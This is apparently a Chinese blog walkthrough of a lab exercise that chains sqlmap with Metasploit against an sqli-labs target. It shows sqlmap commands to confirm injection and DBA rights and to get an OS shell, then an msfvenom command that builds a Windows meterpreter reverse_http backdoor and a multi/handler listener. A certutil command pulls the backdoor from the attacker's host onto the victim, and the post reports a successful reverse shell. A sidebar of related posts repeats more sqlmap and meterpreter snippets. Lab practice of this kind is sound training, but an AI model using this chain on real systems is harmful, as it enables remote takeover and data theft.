sqlmap联动msf

最新推荐文章于 2025-05-28 15:31:53 发布
最新推荐文章于 2025-05-28 15:31:53 发布
阅读量210 收藏
点赞数 2
文章标签: 网络 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63615772/article/details/140915485
版权

靶机 sqli-labs靶场 ip:192.168.206.131

攻击机 kali ip:192.168.206.128

sqlmap -u "http://192.168.206.131/sqli-labs/Less-1/?id=1"

image-20240805014335749

sqlmap -u "" --is-dba

判断是否是最高权限用户 发现是 可以进行 高权限操作 -os-shell

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.206.128 lport=9999 -f exe -o sql.exe#生成msf后门

  开启监听:
        msf6> use exploit/multi/handler
        msf6> set lhost 192.168.206.128
        msf6> set lport 9999
        msf6> run

image-20240805023856998

我这将sql.exe 放在192.168.206.131 的目录下当做 我的远程服务器

 python sqlmap.py -u "URL" --os-shell=certutil -urlcache -split -f http://攻击者服务器地址/后门文件 下载到目标机地址下d:/sql.exe     #交互式命令执行下载后门 将sql.exe下载到受害机上

sqlmap -u "http://192.168.206.131/sqli-labs/Less-1/?id=1" --os-shell#先获取os-shell

image-20240805023454555

执行命令

image-20240805023730253

反弹成功

image-20240805023830188

反弹成功

[外链图片转存中…(img-GZbl86Uf-1722797040939)]

k大帅1
关注
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1523
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
2024新版SonarQube+JenKins+Github联动代码扫描(3)-三者联动配置最终章_怎么使用sonarqube扫描github上的项目
2401_84254364的博客
05-02 715
sonar生成一个用户token:这个sonar的token一定要备份好,因为只显示一次。
msf 笔记 & sqlmap 笔记
dqd66的博客
10-18 581
msf exploit(handler) > set exitonsession false 运行这条命令后,4444端口会一直处于侦听状态meterpreter > run post/windows/gather/credentials/credential_collector 目标主机上的身份认证信息meterpreter > run post/windows/gather/enum_applications 目标主机安装了哪些软件。
河南省高校联盟战队课件3(sql-sqlmap基础&msf
尘玥的故事
04-20 2347
sqlmap常用参数 1.-它支持那些其他不一样功能? 2.-使用SQLMAP一般注入流程分析? 一、常见注入点&提交方式(sqlmap判断是否有注入): 1.sqlmap设置post提交方式 -f fingerprint 指纹 (1)(sqlmap -u http=“xxxxxx” --data=“id=1” -f --banner --dbs -users) (2)(-methood = post)进行转换 2.sqlm...
Sqlmap使用/联合msf
m0_63160363的博客
12-22 1036
python sqlmap.py -u "URL" --file-write "本地后门路径" --file-dest "写入目标地址文件路径" #文件写入。python sqlmap.py -u "URL" --dump -C "列名,列名" -T "表名" -D "数据库名" #获取数据库表的列内的内容。python sqlmap.py -u "URL" --dump -C "列名" -T "表名" -D "数据库名" #获取数据库表的列内的内容。
网安之web攻防第二十六天
B_l_a_nk的博客
03-31 562
1、数据库注入-Oracle&Mongodb 2、数据库注入-DB2&SQLite&Sybase 3、SQL注入神器-SQLMAP安装使用拓展
sqlmap查找SQL注入漏洞入门
weixin_43224068的博客
12-05 1166
sqlmap查找SQL注入漏洞入门 1、安装sqlmap sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。注意:sqlmap只是用来检测和利用sql注入点的,使用前请先使用扫描工具扫出sql注入点。 它由python语言开发而成,因此运行需要安装python环境。它依赖于python 2.x ,请不要安装python 3.x 1.1 安装pyhon 在Win...
[工具使用]SqlMap
热门推荐
网络安全知识分享
08-29 5万+
[工具使用]SqlMapSqlMap常用指令探测目标网站是否存在注入 本文采用实例:sqli-labs靶场Less-1 SqlMap 一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1、基于布尔
day26 SQL注入神器—— Sqlmap
wanjia01的博客
10-15 399
小迪安全笔记
bat 命令返回结果_sqlmap关于MSSQL执行命令研究
weixin_39865102的博客
11-21 436
0x00 环境概述0x01 测试sqlmap命令--os-shell--sql-shell--os-pwn--os-smbrelay--os-bof--reg-[read/add/del]0x02 反思命令执行反思注册表操作反思联动MSF反思存储过程缓冲区溢出反思0x03 总结命令执行--os-shell注册表 --reg-[]MSF&CS联动0x00 环境概述环境说明:Wind...
封神台-掌控者新靶场 - Kali系列4题
weixin_43821278的博客
03-11 1万+
新靶场 - Kali系列【4题】 Kali渗透 - Sqlmap实操靶场
CFS三层靶机——内网渗透流程
2301_81177363的博客
05-05 961
靶场由三台服务器构成分别为Target1、Target2、Target3,其系统分别是centos、Ubuntu、Windows7。Target1搭载VMnet2和NAT网卡、Target2搭载VMnet2和VMnet3网卡、Target3仅搭载VMnet3网卡。(确保两两之间能互相通信)
Netty 框架介绍
技术改变世界
05-28 258
Netty是一个基于 Java NIO(Non-blocking I/O)的异步事件驱动网络应用框架,旨在快速开发高性能、高可靠性的网络服务器和客户端。它简化了 TCP/UDP 等协议的编程,并提供了高度可定制的组件,适用于高并发场景(如游戏服务器、即时通讯、分布式系统等)。
[特殊字符]使用 Hyperlane 实现 WebSocket广播
m0_52796585的博客
05-27 855
## 推荐几款学习编程的免费平台 ### 免费在线开发平台([https://docs.ltpp.vip/LTPP/](https://docs.ltpp.vip/LTPP/)) <blockquote> <p>        探索编程世界的新天地,为学生和开发者精心打造的编程平台,现已盛大开启!这个平台汇集了近4000道精心设计的编程题目,覆盖了C、C++、JavaScript、TypeScript、Go、Rust、PHP、Java、Ruby
AXI协议乱序传输机制解析:提升SoC性能的关键设计
最新发布
JInx299的博客
05-28 262
AXI(Advanced eXtensible Interface)协议的乱序传输(Out-of-Order)机制是现代高性能SoC设计的核心特性之一。本文深入探讨AXI如何通过ID标识符和通道独立性实现高效的数据乱序传输,显著提升总线利用率和系统并发性能
LiveNVR接入大华、海康、宇视、天地伟业SDK:拉转直播流文件ISUP接入并转换成多格式视频直播流地址
青柿视频流媒体的博客
05-28 395
本文围绕 LiveNVR 监控流媒体 Onvif_RTSP 功能展开,介绍其可将传统安防监控设备互联化,实现无插件直播。具体内容包括:配置拉转视频流,涵盖 RTSP 规则、通道配置等多种方式;介绍视频集成方式,如分享页面集成和视频流地址集成;阐述获取直播流地址的三种途径,即页面查看、接口调用和静态拼接;还提及接口调用相关问题及 RTSP/HLS/FLV/RTMP 拉流 Onvif 流媒体服务的系统支持、安装说明等。
Python 网络编程
2301_80839375的博客
05-26 1114
定义:Socket 是网络通信的端点,用于不同主机或同一主机的进程间通信。核心要素地址族AF_INET(IPv4)、AF_INET6(IPv6)。协议类型(TCP)、SOCK_DGRAM(UDP)。通信流程服务器:创建 Socket → 绑定 IP 和端口 → 监听连接 → 接受连接 → 收发数据。客户端:创建 Socket → 连接服务器 → 收发数据。
K8S-statefulset-mysql-ha
demon7552003的小本本
05-24 686
本文介绍了在Kubernetes上部署MySQL高可用集群的方案
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值